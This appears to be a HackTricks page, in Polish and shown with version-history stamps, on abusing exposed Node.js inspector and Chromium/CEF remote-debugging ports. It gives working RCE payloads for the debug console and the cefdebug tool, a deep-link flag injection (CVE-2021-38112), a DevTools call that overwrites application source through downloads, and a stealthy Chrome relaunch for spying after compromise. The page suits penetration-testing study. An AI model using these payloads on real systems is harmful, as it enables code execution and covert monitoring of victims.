hacktricks/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md

176 lines
12 KiB
Markdown
Raw Normal View History

2024-02-11 01:46:25 +00:00
# Wykorzystanie debugera Node inspector/CEF
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2023-12-30 20:49:49 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 01:46:25 +00:00
## Podstawowe informacje
2020-09-20 22:47:34 +00:00
2024-02-11 01:46:25 +00:00
[Z dokumentacji](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): Gdy uruchomiony jest proces Node.js z przełącznikiem `--inspect`, nasłuchuje on na klienta debugującego. **Domyślnie** nasłuchuje na adresie hosta i porcie **`127.0.0.1:9229`**. Każdy proces otrzymuje również **unikalne** **UUID**.
2020-09-20 22:47:34 +00:00
2024-02-11 01:46:25 +00:00
Klienci debugera muszą znać i określić adres hosta, port i UUID, aby się połączyć. Pełny adres URL będzie wyglądał na coś takiego: `ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`.
2022-04-27 16:38:13 +00:00
{% hint style="warning" %}
2024-02-11 01:46:25 +00:00
Ponieważ **debuger ma pełny dostęp do środowiska wykonawczego Node.js**, złośliwy aktor, który jest w stanie połączyć się z tym portem, może wykonać dowolny kod w imieniu procesu Node.js (**potencjalne eskalowanie uprawnień**).
2022-04-27 16:38:13 +00:00
{% endhint %}
2024-02-11 01:46:25 +00:00
Istnieje kilka sposobów uruchomienia debugera:
2022-04-27 16:38:13 +00:00
```bash
node --inspect app.js #Will run the inspector in port 9229
node --inspect=4444 app.js #Will run the inspector in port 4444
node --inspect=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
# --inspect-brk is equivalent to --inspect
node --inspect --inspect-port=0 app.js #Will run the inspector in a random port
# Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector
```
2024-02-11 01:46:25 +00:00
Kiedy uruchomisz proces poddany inspekcji, pojawi się coś takiego:
2022-04-28 01:02:01 +00:00
```
Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
For help, see: https://nodejs.org/en/docs/inspector
```
2024-02-11 01:46:25 +00:00
Procesy oparte na **CEF** (**Chromium Embedded Framework**), takie jak, muszą używać parametru: `--remote-debugging-port=9222`, aby otworzyć **debugger** (ochrona przed SSRF pozostaje bardzo podobna). Jednakże, zamiast udostępniać sesję **debugowania** **NodeJS**, będą komunikować się z przeglądarką za pomocą [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), jest to interfejs do kontrolowania przeglądarki, ale nie ma bezpośredniego RCE.
2022-04-28 01:02:01 +00:00
2024-02-11 01:46:25 +00:00
Gdy uruchomisz przeglądarkę w trybie debugowania, pojawi się coś takiego:
2022-04-28 01:02:01 +00:00
```
DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
```
2024-02-11 01:46:25 +00:00
### Przeglądarki, WebSockety i polityka same-origin <a href="#browsers-websockets-and-same-origin-policy" id="browsers-websockets-and-same-origin-policy"></a>
2022-04-27 16:38:13 +00:00
2024-02-11 01:46:25 +00:00
Strony internetowe otwarte w przeglądarce internetowej mogą wykonywać żądania WebSocket i HTTP zgodnie z modelem bezpieczeństwa przeglądarki. **Początkowe połączenie HTTP** jest konieczne do **uzyskania unikalnego identyfikatora sesji debugera**. **Polityka same-origin** **uniemożliwia** stronom internetowym wykonanie **tego połączenia HTTP**. W celu dodatkowego zabezpieczenia przed [**atakami DNS rebinding**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** Node.js sprawdza, czy nagłówki **'Host'** dla połączenia określają dokładnie **adres IP** lub **`localhost`** lub **`localhost6`**.
2022-04-27 16:38:13 +00:00
{% hint style="info" %}
2024-02-11 01:46:25 +00:00
Te **środki bezpieczeństwa uniemożliwiają wykorzystanie inspektora** do uruchamiania kodu **poprzez wysłanie żądania HTTP** (co mogłoby być możliwe w przypadku wykorzystania podatności SSRF).
2022-04-27 16:38:13 +00:00
{% endhint %}
2024-02-11 01:46:25 +00:00
### Uruchamianie inspektora w działających procesach
2022-04-28 01:02:01 +00:00
2024-02-11 01:46:25 +00:00
Możesz wysłać **sygnał SIGUSR1** do działającego procesu Node.js, aby **uruchomić inspektora** na domyślnym porcie. Należy jednak zauważyć, że wymaga to odpowiednich uprawnień, więc może to dać ci **uprzywilejowany dostęp do informacji wewnątrz procesu**, ale nie bezpośrednie podniesienie uprawnień.
2022-04-28 01:02:01 +00:00
```bash
kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
```
2022-04-27 16:38:13 +00:00
{% hint style="info" %}
2024-02-11 01:46:25 +00:00
Jest to przydatne w kontenerach, ponieważ **zamknięcie procesu i uruchomienie nowego** z opcją `--inspect` nie jest **opcją**, ponieważ **kontener** zostanie **zabity** wraz z procesem.
2022-04-27 16:38:13 +00:00
{% endhint %}
2024-02-11 01:46:25 +00:00
### Połączenie z inspektorem/debuggerem
2022-04-27 16:38:13 +00:00
2024-02-11 01:46:25 +00:00
Aby połączyć się z przeglądarką opartą na Chromium, można użyć adresów URL `chrome://inspect` lub `edge://inspect` dla przeglądarki Chrome lub Edge. Klikając przycisk Konfiguruj, należy upewnić się, że **adres hosta i port** są poprawnie wymienione. Obrazek pokazuje przykład zdalnego wykonania kodu (RCE):
2022-04-27 16:38:13 +00:00
2022-04-28 15:47:13 +00:00
![](<../../.gitbook/assets/image (620) (1).png>)
2022-04-27 16:38:13 +00:00
2024-02-11 01:46:25 +00:00
Za pomocą **wiersza poleceń** można połączyć się z debuggerem/inspektorem za pomocą:
2022-04-28 01:02:01 +00:00
```bash
node inspect <ip>:<port>
node inspect 127.0.0.1:9229
# RCE example from debug console
debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')")
2020-09-20 22:47:34 +00:00
```
2024-02-11 01:46:25 +00:00
Narzędzie [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug) umożliwia **znalezienie inspektorów** działających lokalnie i **wstrzyknięcie kodu** do nich.
2020-09-20 22:47:34 +00:00
```bash
#List possible vulnerable sockets
./cefdebug.exe
#Check if possibly vulnerable
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version"
#Exploit it
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"
```
2022-04-28 01:02:01 +00:00
{% hint style="info" %}
2024-02-11 01:46:25 +00:00
Należy zauważyć, że **exploity RCE NodeJS nie zadziałają**, jeśli jesteś połączony z przeglądarką za pomocą [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (musisz sprawdzić API, aby znaleźć interesujące rzeczy, które można z nim zrobić).
2022-04-28 01:02:01 +00:00
{% endhint %}
2024-02-11 01:46:25 +00:00
## RCE w NodeJS Debugger/Inspector
2022-04-28 01:02:01 +00:00
{% hint style="info" %}
2024-02-11 01:46:25 +00:00
Jeśli tu trafiłeś, szukając sposobu na uzyskanie [**RCE z XSS w Electron, sprawdź tę stronę.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
2022-04-28 01:02:01 +00:00
{% endhint %}
2024-02-11 01:46:25 +00:00
Niektóre powszechne sposoby uzyskania **RCE**, gdy można **połączyć się** z **inspektorem** Node, to używanie czegoś takiego jak (wygląda na to, że to **nie zadziała w połączeniu z protokołem Chrome DevTools**):
2022-04-28 01:02:01 +00:00
```javascript
process.mainModule.require('child_process').exec('calc')
window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe")
require('child_process').spawnSync('calc.exe')
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
```
2022-05-01 13:25:53 +00:00
## Chrome DevTools Protocol Payloads
2022-04-27 16:38:13 +00:00
2024-02-11 01:46:25 +00:00
Możesz sprawdzić API tutaj: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\
W tej sekcji po prostu wymienię interesujące rzeczy, które ludzie wykorzystali do ataku na ten protokół.
2022-05-05 07:55:36 +00:00
2024-02-11 01:46:25 +00:00
### Wstrzykiwanie parametrów za pomocą głębokich linków
2022-05-05 07:55:36 +00:00
2024-02-11 01:46:25 +00:00
W przypadku [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino Security odkrył, że aplikacja oparta na CEF **zarejestrowała niestandardowy adres URI** w systemie (workspaces://), który otrzymywał pełny adres URI, a następnie **uruchamiał aplikację opartą na CEF** z konfiguracją częściowo konstruowaną na podstawie tego adresu URI.
2022-05-05 07:55:36 +00:00
2024-02-11 01:46:25 +00:00
Odkryto, że parametry adresu URI były dekodowane z użyciem URL i używane do uruchamiania podstawowej aplikacji CEF, co umożliwia użytkownikowi **wstrzyknięcie** flagi **`--gpu-launcher`** w **linii poleceń** i wykonanie dowolnych czynności.
2022-05-05 07:55:36 +00:00
2024-02-11 01:46:25 +00:00
Więc, payload tak jak:
2022-05-05 07:55:36 +00:00
```
workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE
```
2024-02-11 01:46:25 +00:00
Wykonaj calc.exe.
2022-05-05 07:55:36 +00:00
2024-02-11 01:46:25 +00:00
### Nadpisywanie plików
2022-04-28 01:02:01 +00:00
2024-02-11 01:46:25 +00:00
Zmień folder, w którym **zapisywane są pobrane pliki**, i pobierz plik, aby **nadpisać** często używany **kod źródłowy** aplikacji swoim **złośliwym kodem**.
2022-04-28 01:02:01 +00:00
```javascript
2022-04-28 23:38:36 +00:00
ws = new WebSocket(url); //URL of the chrome devtools service
2022-04-28 01:02:01 +00:00
ws.send(JSON.stringify({
2024-02-11 01:46:25 +00:00
id: 42069,
method: 'Browser.setDownloadBehavior',
params: {
behavior: 'allow',
downloadPath: '/code/'
}
2022-04-28 01:02:01 +00:00
}));
```
2024-02-11 01:46:25 +00:00
### Wykorzystanie Webdriver RCE i eksfiltracja
2020-12-18 09:51:50 +00:00
2024-02-11 01:46:25 +00:00
Zgodnie z tym postem: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148), możliwe jest uzyskanie RCE i eksfiltracja wewnętrznych stron z theriver.
2022-04-28 13:46:37 +00:00
2024-02-11 01:46:25 +00:00
### Po eksploatacji
2022-04-28 10:43:42 +00:00
2024-02-11 01:46:25 +00:00
W rzeczywistym środowisku i **po skompromitowaniu** komputera użytkownika korzystającego z przeglądarki opartej na Chrome/Chromium, można uruchomić proces Chrome z aktywowanym debugowaniem i przekierować port debugowania, aby uzyskać do niego dostęp. W ten sposób będzie można **inspirować wszystko, co ofiara robi w Chrome i kraść wrażliwe informacje**.
2022-04-28 10:43:42 +00:00
2024-02-11 01:46:25 +00:00
Sposobem na działanie w ukryciu jest **zakończenie każdego procesu Chrome** i następnie wywołanie czegoś w stylu
2022-04-28 10:43:42 +00:00
```bash
Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
```
2024-02-11 01:46:25 +00:00
## Odwołania
2020-09-20 22:47:34 +00:00
2022-04-27 16:38:13 +00:00
* [https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s)
2020-09-20 22:47:34 +00:00
* [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug)
* [https://iwantmore.pizza/posts/cve-2019-1414.html](https://iwantmore.pizza/posts/cve-2019-1414.html)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=773](https://bugs.chromium.org/p/project-zero/issues/detail?id=773)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1742](https://bugs.chromium.org/p/project-zero/issues/detail?id=1742)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1944](https://bugs.chromium.org/p/project-zero/issues/detail?id=1944)
2022-04-27 16:38:13 +00:00
* [https://nodejs.org/en/docs/guides/debugging-getting-started/](https://nodejs.org/en/docs/guides/debugging-getting-started/)
2022-04-28 01:02:01 +00:00
* [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)
* [https://larry.science/post/corctf-2021/#saasme-2-solves](https://larry.science/post/corctf-2021/#saasme-2-solves)
2022-04-28 10:43:42 +00:00
* [https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2023-12-30 20:49:49 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>